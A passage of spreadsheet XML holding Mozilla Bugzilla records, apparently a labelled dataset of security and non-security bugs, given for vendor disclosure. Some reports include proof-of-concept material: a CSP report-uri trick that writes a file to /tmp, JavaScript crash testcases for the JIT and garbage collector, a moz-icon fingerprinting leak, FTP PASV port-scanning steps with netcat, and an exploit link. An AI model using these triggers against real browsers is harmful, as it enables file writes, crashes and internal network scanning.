For a demonstration of the issue you may visit the following link with a UNIX host and check your /tmp directory afterwards. It should contain a file called attack_works.html.
https://c.iceqll.eu/overwrite_resource.php
The attack sends the following CSP header and then violates it:
Content-Security-Policy: script-src 'none'; report-uri file:///tmp/attack_works.html
Works in:
- FF 42, 43, 44
The first tested version where it _does not work anymore_ is the Nightly Build (47.xx).
Why do I report the issue anyway? Two reasons:
- Maybe it was fixed by accident and the severity went unnoticed
- I am in the course of writing a thesis, so I'd love to have something to reference - and if this is a duplicate, I'd like to reference that. Sorry. I'm being very selfish :-/</t>
        </is>
      </c>
      <c r="X3060" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3061">
      <c r="A3061" t="n">
        <v>952022</v>
      </c>
      <c r="B3061" t="inlineStr">
        <is>
          <t>2013-12-19 00:49:46 -0800</t>
        </is>
      </c>
      <c r="C3061" t="inlineStr">
        <is>
          <t>Crash [@ js::AsmJSModule::detachIonCompilation] or Assertion failure: exit.interpCodeOffset_, at jit/AsmJSModule.h</t>
        </is>
      </c>
      <c r="D3061" t="inlineStr">
        <is>
          <t>2015-05-18 15:32:16 -0700</t>
        </is>
      </c>
      <c r="E3061" t="n">
        <v>1</v>
      </c>
      <c r="F3061" t="n">
        <v>1</v>
      </c>
      <c r="G3061" t="n">
        <v>3</v>
      </c>
      <c r="H3061" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3061" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3061" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3061" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3061" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3061" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3061" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3061" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3061" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q3061" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3061" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3061" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T3061" t="n">
        <v>1</v>
      </c>
      <c r="U3061" t="n">
        <v>0</v>
      </c>
      <c r="V3061" t="n">
        <v>24</v>
      </c>
      <c r="W3061" t="inlineStr">
        <is>
          <t>Created attachment 8349933
assertion and crash stacks
function g(f) {
    for (var j = 0; j &lt; 9; ++j) {
        try {
            f()
        } catch (e) {}
    }
}
function h(code) {
    Function(code)();
}
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
g([]);
h("\
    m = (function(stdlib, foreign) { \
        \"use asm\";\
        var ff=foreign.ff;\
        function f(){\
            ff(0);\
        } \
        return f \
    })(this , { \
        ff: arguments.callee.caller\
    });\
    g(m , []);\
");
h("\
    m = undefined;\
    gc();\
")
asserts js debug shell on m-c changeset 7d120481a6ae with --ion-eager --ion-parallel-compile=off at Assertion failure: exit.interpCodeOffset_, at jit/AsmJSModule.h but sometimes crashes instead, at js::AsmJSModule::detachIonCompilation
s-s because gc seems to be involved.
My configure flags are:
CC="clang -Qunused-arguments" AR=ar CXX="clang++ -Qunused-arguments" sh ./configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --enable-methodjit --enable-type-inference --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/dbeea0e93b56
user:        Brian Hackett
date:        Mon Dec 16 10:53:02 2013 -0800
summary:     Bug 785905 - Build Ion MIR graph off thread, r=jandem.
Brian, is bug 785905 a likely regressor?</t>
        </is>
      </c>
      <c r="X3061" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3062">
      <c r="A3062" t="n">
        <v>1424261</v>
      </c>
      <c r="B3062" t="inlineStr">
        <is>
          <t>2017-12-08 07:03:08 -0800</t>
        </is>
      </c>
      <c r="C3062" t="inlineStr">
        <is>
          <t>moz-icon images can be linked and read from the web</t>
        </is>
      </c>
      <c r="D3062" t="inlineStr">
        <is>
          <t>2019-12-04 15:01:12 -0800</t>
        </is>
      </c>
      <c r="E3062" t="n">
        <v>1</v>
      </c>
      <c r="F3062" t="n">
        <v>1</v>
      </c>
      <c r="G3062" t="n">
        <v>2</v>
      </c>
      <c r="H3062" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3062" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3062" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K3062" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L3062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3062" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3062" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3062" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q3062" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3062" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3062" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T3062" t="n">
        <v>1</v>
      </c>
      <c r="U3062" t="n">
        <v>0</v>
      </c>
      <c r="V3062" t="n">
        <v>21</v>
      </c>
      <c r="W3062" t="inlineStr">
        <is>
          <t>Created attachment 8935788
svger.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
Tested on Nightly 59.0a1 (2017-12-07) (64-bit).
View attached PoC.
Actual results:
It seems that we can still link moz-icon urls if we include the current pages URL within it like so: moz-icon:http://localhost/poc.html?size=64&amp;contentType=application/xml 
I then noticed that we can read the image through canvas.toDataURL. So we are now able to determine which application is used to open certain file types, as well as potential fingerprinting of user within private browsing (?).
Expected results:
moz-icon should be blocked from linking on the web. Also I think its worth checking why canvas.toDataURL is working here.</t>
        </is>
      </c>
      <c r="X3062" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3063">
      <c r="A3063" t="n">
        <v>370559</v>
      </c>
      <c r="B3063" t="inlineStr">
        <is>
          <t>2007-02-15 16:03:13 -0800</t>
        </is>
      </c>
      <c r="C3063" t="inlineStr">
        <is>
          <t>security problem handling responses to FTP PASV command</t>
        </is>
      </c>
      <c r="D3063" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E3063" t="n">
        <v>1</v>
      </c>
      <c r="F3063" t="n">
        <v>1</v>
      </c>
      <c r="G3063" t="n">
        <v>6</v>
      </c>
      <c r="H3063" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3063" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3063" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K3063" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3063" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3063" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3063" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3063" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3063" t="inlineStr">
        <is>
          <t>[sg:low] port-scan</t>
        </is>
      </c>
      <c r="Q3063" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3063" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3063" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T3063" t="n">
        <v>1</v>
      </c>
      <c r="U3063" t="n">
        <v>0</v>
      </c>
      <c r="V3063" t="n">
        <v>11</v>
      </c>
      <c r="W3063" t="inlineStr">
        <is>
          <t>Mail received by security@mozilla.org from "mark". Got lost in the spam, originally sent on Jan 29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
The following bug affects Firefox 2.0.0.1.  I believe it also affects
previous versions.
The format of this mail is based on the "Guided" bug report web page.
Hardware platform
-----------------
PC
Operating System
----------------
Linux (but also tested on Windows XP)
Build Identifier
----------------
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.1) Gecko/20070118
BonEcho/2.0.0.1
URL
---
N/A
Summary
-------
Firefox security problem handling responses to FTP PASV command
Details
-------
During a normal FTP conversation between Firefox and an FTP server,
Firefox will send the PASV command:
PASV
and the server will reply with an IP address and port number, e.g:
227 Entering Passive Mode (127,0,0,1,35,40)
Firefox then connects to the IP and port provided to retrieve data from
the FTP server (directory listing, file or whatever).
So far this is normal behaviour for an FTP client.  However, if the FTP
server is malicious, it could send back an IP address other than its
own.  This causes Firefox to connect to the IP address and port chosen
by the malicious FTP server.
The impact of this is discussed in the "Additional Information" section
below.
Reproducability
---------------
Happens every time.
Steps to Reproduce
------------------
1. Start a packet sniffer on the loopback interface, e.g: tcpdump -n -i lo
2. On the same host start a netcat listener on port 21: nc -v -n -l -p 21
3. On the same host open firefox and enter the URL: ftp://127.0.0.1/
4. netcat should now show an incoming connection, e.g:
# nc -v -n -l -p 21
listening on [any] 21 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37209
5. You now need to send a series of FTP commands to firefox.  In the
netcat session, first send an FTP banner "220 myftpserver".  After
pressing ENTER firefox should send a login name.  Reply with "230
Login successful.".  Continue as shown in the instructions below (note
that each response you need to send starts with 3 digits and the "SEND:"
part should not be typed).
SEND: 220 myftpserver
RECV: USER anonymous
SEND: 230 Login successful.
RECV: SYST
SEND: 215 UNIX Type: L8
RECV: PWD
SEND: 257 "/"
RECV: TYPE I
SEND: 200 Switching to Binary mode.
RECV: PASV
SEND: 227 Entering Passive Mode (127,0,0,99,35,40)
Now flick back to the packet sniffer you started in step 1.
Upon sending of the "227" response above, you should see firefox try
to connect to the address specified (127.0.0.99) - though this could
have been any address (even one on a client's internal network).
Actual Results
--------------
Firefox connect to the IP address supplied by the (possibly malicious)
FTP server.
Expected Results
----------------
(IMHO) Firefox should ignore the IP address supplied by the FTP server
in its PASV response.  Here's my reasoning...
In practice, the IP address sent in the PASV response (127,0,0,99 above)
should always be the same IP address to which the client connected
initially (i.e. 127.0.0.1 in the example above because the client
connected to ftp://127.0.0.1).  It therefore seem wise to ignore the IP
address sent in the PASV response (127,0,0,99 above) and instead use the
IP address the client connected to (127.0.0.1 above).
This seems to be what Internet Explorer 6 and 7 do.
Additional Information
----------------------
It is therefore possible for a malicious web page + malicious FTP server
to cause Firefox to connect to arbitrary ports on arbitrary hosts - even
ones on a client's internal network, and even ports on the banned list
(http://www.mozilla.org/projects/netlib/PortBanning.html).
Using JavaScript, it would be possible for the malicious website to have
information like the following sent back out by firefox to an attacker:
127.0.0.1:22 returned banner: SSH-2.0-OpenSSH_4.5%0A
10.0.0.1:21 returned banner: 220%20%28vsFTPd%202.0.4%29%0A
Note that javascript portscanning is not new.  It well documented here:
http://www.spidynamics.com/assets/documents/JSportscan.pdf
The new security problems posed by the PASV problem are:
- Bypassing of the banned ports list
- Grabbing of banners from other network services as show above
Please let me know if you need any further information.
Regards,
Mark</t>
        </is>
      </c>
      <c r="X3063" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3064">
      <c r="A3064" t="n">
        <v>612961</v>
      </c>
      <c r="B3064" t="inlineStr">
        <is>
          <t>2010-11-17 11:46:29 -0800</t>
        </is>
      </c>
      <c r="C3064" t="inlineStr">
        <is>
          <t>Update Rev Guide to Beta 8 on press Page</t>
        </is>
      </c>
      <c r="D3064" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E3064" t="n">
        <v>1</v>
      </c>
      <c r="F3064" t="n">
        <v>1</v>
      </c>
      <c r="G3064" t="n">
        <v>5</v>
      </c>
      <c r="H3064" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3064" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J3064" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3064" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3064" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3064" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3064" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3064" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3064" t="inlineStr"/>
      <c r="Q3064" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3064" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3064" t="inlineStr">
        <is>
          <t>4.0</t>
        </is>
      </c>
      <c r="T3064" t="n">
        <v>1</v>
      </c>
      <c r="U3064" t="n">
        <v>0</v>
      </c>
      <c r="V3064" t="n">
        <v>7</v>
      </c>
      <c r="W3064" t="inlineStr">
        <is>
          <t>Will post new Rev Guide soon.</t>
        </is>
      </c>
      <c r="X3064" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3065">
      <c r="A3065" t="n">
        <v>315871</v>
      </c>
      <c r="B3065" t="inlineStr">
        <is>
          <t>2005-11-10 07:26:56 -0800</t>
        </is>
      </c>
      <c r="C3065" t="inlineStr">
        <is>
          <t>In Certificate Viewer, allow to export cert or full chain</t>
        </is>
      </c>
      <c r="D3065" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E3065" t="n">
        <v>1</v>
      </c>
      <c r="F3065" t="n">
        <v>1</v>
      </c>
      <c r="G3065" t="n">
        <v>6</v>
      </c>
      <c r="H3065" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3065" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3065" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K3065" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3065" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3065" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3065" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3065" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3065" t="inlineStr">
        <is>
          <t>[kerh-eha]</t>
        </is>
      </c>
      <c r="Q3065" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3065" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3065" t="inlineStr">
        <is>
          <t>mozilla1.9beta1</t>
        </is>
      </c>
      <c r="T3065" t="n">
        <v>1</v>
      </c>
      <c r="U3065" t="n">
        <v>10</v>
      </c>
      <c r="V3065" t="n">
        <v>54</v>
      </c>
      <c r="W3065" t="inlineStr">
        <is>
          <t>In Certificate Viewer, allow to export the currently viewed cert or even the full chain
See also bug 161275, another bug that requests the ability to export certificates.</t>
        </is>
      </c>
      <c r="X3065" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3066">
      <c r="A3066" t="n">
        <v>490233</v>
      </c>
      <c r="B3066" t="inlineStr">
        <is>
          <t>2009-04-26 11:39:46 -0700</t>
        </is>
      </c>
      <c r="C3066" t="inlineStr">
        <is>
          <t>crash while displaying this url</t>
        </is>
      </c>
      <c r="D3066" t="inlineStr">
        <is>
          <t>2009-04-29 12:36:22 -0700</t>
        </is>
      </c>
      <c r="E3066" t="n">
        <v>1</v>
      </c>
      <c r="F3066" t="n">
        <v>1</v>
      </c>
      <c r="G3066" t="n">
        <v>2</v>
      </c>
      <c r="H3066" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3066" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3066" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3066" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3066" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3066" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3066" t="inlineStr"/>
      <c r="Q3066" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3066" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3066" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3066" t="n">
        <v>0</v>
      </c>
      <c r="U3066" t="n">
        <v>0</v>
      </c>
      <c r="V3066" t="n">
        <v>5</v>
      </c>
      <c r="W3066" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9
when displaying this url, the browser crashes after about 3 seconds on my athlon 64 2.6 GHz dual core / 4GB ram / debian-{stable,testing} + ubuntu-{hardy,intrepid} mix
Reproducible: Always
Steps to Reproduce:
1. open the mentioned url
2. wait ~ 3 seconds
3.
Actual Results:  
crash - "Program received signal SIGSEGV, Segmentation fault."
It only crashes with "?highlight=file"</t>
        </is>
      </c>
      <c r="X3066" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3067">
      <c r="A3067" t="n">
        <v>1221771</v>
      </c>
      <c r="B3067" t="inlineStr">
        <is>
          <t>2015-11-04 13:56:32 -0800</t>
        </is>
      </c>
      <c r="C3067" t="inlineStr">
        <is>
          <t>On about:accounts, Firefox warns that your login could be compromised.</t>
        </is>
      </c>
      <c r="D3067" t="inlineStr">
        <is>
          <t>2017-11-21 13:55:23 -0800</t>
        </is>
      </c>
      <c r="E3067" t="n">
        <v>1</v>
      </c>
      <c r="F3067" t="n">
        <v>1</v>
      </c>
      <c r="G3067" t="n">
        <v>2</v>
      </c>
      <c r="H3067" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3067" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3067" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K3067" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3067" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3067" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3067" t="inlineStr">
        <is>
          <t>[fxsync][fxprivacy]</t>
        </is>
      </c>
      <c r="Q3067" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3067" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3067" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3067" t="n">
        <v>1</v>
      </c>
      <c r="U3067" t="n">
        <v>0</v>
      </c>
      <c r="V3067" t="n">
        <v>13</v>
      </c>
      <c r="W3067" t="inlineStr">
        <is>
          <t>Created attachment 8683343
aa-login-compromised.png
STR:
* Start a Sync signin flow.
* When on about:accounts, click the globe icon in the URL bar.
Actual:
* Dropdown tells you your login could be compromised.
Expected:
* It doesn't</t>
        </is>
      </c>
      <c r="X3067" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3068">
      <c r="A3068" t="n">
        <v>6293</v>
      </c>
      <c r="B3068" t="inlineStr">
        <is>
          <t>1999-05-11 17:05:53 -0700</t>
        </is>
      </c>
      <c r="C3068" t="inlineStr">
        <is>
          <t>[PP]window.open() fails to load URL on current window name</t>
        </is>
      </c>
      <c r="D3068" t="inlineStr">
        <is>
          <t>2004-01-14 12:09:42 -0800</t>
        </is>
      </c>
      <c r="E3068" t="n">
        <v>1</v>
      </c>
      <c r="F3068" t="n">
        <v>1</v>
      </c>
      <c r="G3068" t="n">
        <v>3</v>
      </c>
      <c r="H3068" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3068" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3068" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3068" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3068" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3068" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3068" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3068" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3068" t="inlineStr">
        <is>
          <t>[TESTCASE] simple testcase already supplied BLOCKER</t>
        </is>
      </c>
      <c r="Q3068" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3068" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3068" t="inlineStr">
        <is>
          <t>M10</t>
        </is>
      </c>
      <c r="T3068" t="n">
        <v>1</v>
      </c>
      <c r="U3068" t="n">
        <v>0</v>
      </c>
      <c r="V3068" t="n">
        <v>25</v>
      </c>
      <c r="W3068" t="inlineStr">
        <is>
          <t>Version: Seamonkey
Program: Viewer.exe
BuildID: 5/10/99
Platform: Linux Red Hat 5.2
Using window.open to load an URI in current window causes a segmentation fault
if a window name was specified.
It fails on Linux only. The same code runs fine in 4.5 and previous versions.
Steps to reproduce:
1. Create a file with the following contents:
&lt;HTML&gt;
&lt;HEADER&gt;
&lt;TITLE&gt;Parent Window&lt;/TITLE&gt;
&lt;/HEADER&gt;
&lt;BODY&gt;
&lt;SCRIPT&gt;
// Required just for assigning a window name to child window
window.open('childw2.html', 'childw');
&lt;/SCRIPT&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;
2. Create a second file with the following contents, and name it as
"childw2.html":
&lt;HTML&gt;
&lt;HEADER&gt;
&lt;TITLE&gt;Child Window&lt;/TITLE&gt;
&lt;/HEADER&gt;
&lt;BODY&gt;
&lt;SCRIPT&gt;
window.open('http://bubblegum', 'childw');
&lt;/SCRIPT&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;
3. Load the first file in viewer.exe
Actual Results: Exits due to Segmentation fault
Expected Results: Default page from bubblegum loaded in second window.
This is blocking automated tests from running on Linux.</t>
        </is>
      </c>
      <c r="X3068" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3069">
      <c r="A3069" t="n">
        <v>996536</v>
      </c>
      <c r="B3069" t="inlineStr">
        <is>
          <t>2014-04-15 03:52:59 -0700</t>
        </is>
      </c>
      <c r="C3069" t="inlineStr">
        <is>
          <t>Assertion failure: isInterpretedLazy() &amp;&amp; u.i.s.lazy_, at jsfun.h:328 or Crash [@ JSFunction::lazyScript] or Crash [@ js::ExclusiveContext::getNewType] with gcPreserveCode</t>
        </is>
      </c>
      <c r="D3069" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:52 -0700</t>
        </is>
      </c>
      <c r="E3069" t="n">
        <v>1</v>
      </c>
      <c r="F3069" t="n">
        <v>1</v>
      </c>
      <c r="G3069" t="n">
        <v>3</v>
      </c>
      <c r="H3069" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3069" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3069" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3069" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3069" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3069" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3069" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3069" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3069" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main30+]</t>
        </is>
      </c>
      <c r="Q3069" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3069" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3069" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T3069" t="n">
        <v>1</v>
      </c>
      <c r="U3069" t="n">
        <v>0</v>
      </c>
      <c r="V3069" t="n">
        <v>18</v>
      </c>
      <c r="W3069" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 5b6e82e7bbbf (run with --fuzzing-safe --ion-eager):
gcPreserveCode();
var lfcode = new Array();
lfcode.push = loadFile;
lfcode.push("\
function f() {}\
res = new f();\
var otherGlobalDifferentCompartment = newGlobal();\
eval = otherGlobalDifferentCompartment.eval;\
assertEq(res[(27)], otherGlobalDifferentCompartment);\
");
lfcode.push("setObjectMetadataCallback(function(obj) {});");
lfcode.push("gczeal(2,1);");
lfcode.push("var obj = new Intl.DateTimeFormat();");
function loadFile(lfVarx) {
    try {
	eval(lfVarx); 
    } catch (lfVare) {}
}</t>
        </is>
      </c>
      <c r="X3069" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3070">
      <c r="A3070" t="n">
        <v>293302</v>
      </c>
      <c r="B3070" t="inlineStr">
        <is>
          <t>2005-05-07 16:26:17 -0700</t>
        </is>
      </c>
      <c r="C3070" t="inlineStr">
        <is>
          <t>Firefox 1.0.3 Critical Vulnerability</t>
        </is>
      </c>
      <c r="D3070" t="inlineStr">
        <is>
          <t>2022-06-19 18:38:55 -0700</t>
        </is>
      </c>
      <c r="E3070" t="n">
        <v>0</v>
      </c>
      <c r="F3070" t="n">
        <v>0</v>
      </c>
      <c r="G3070" t="n">
        <v>2</v>
      </c>
      <c r="H3070" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3070" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3070" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3070" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3070" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3070" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3070" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3070" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3070" t="inlineStr">
        <is>
          <t>workaround: disable "tools/options/web-Features/&gt;Allow web sites to install software"</t>
        </is>
      </c>
      <c r="Q3070" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3070" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3070" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3070" t="n">
        <v>1</v>
      </c>
      <c r="U3070" t="n">
        <v>2</v>
      </c>
      <c r="V3070" t="n">
        <v>67</v>
      </c>
      <c r="W3070" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FREE; .NET CLR 1.1.4322)
Build Identifier: 
Remote compromise : http://www.frsirt.com/exploits/20050507.firefox0day.php
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X3070" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3071">
      <c r="A3071" t="n">
        <v>1716082</v>
      </c>
      <c r="B3071" t="inlineStr">
        <is>
          <t>2021-06-11 14:59:34 -0700</t>
        </is>
      </c>
      <c r="C3071" t="inlineStr">
        <is>
          <t>Deleting security exception doesn't restore warning</t>
        </is>
      </c>
      <c r="D3071" t="inlineStr">
        <is>
          <t>2024-05-30 10:32:17 -0700</t>
        </is>
      </c>
      <c r="E3071" t="n">
        <v>1</v>
      </c>
      <c r="F3071" t="n">
        <v>1</v>
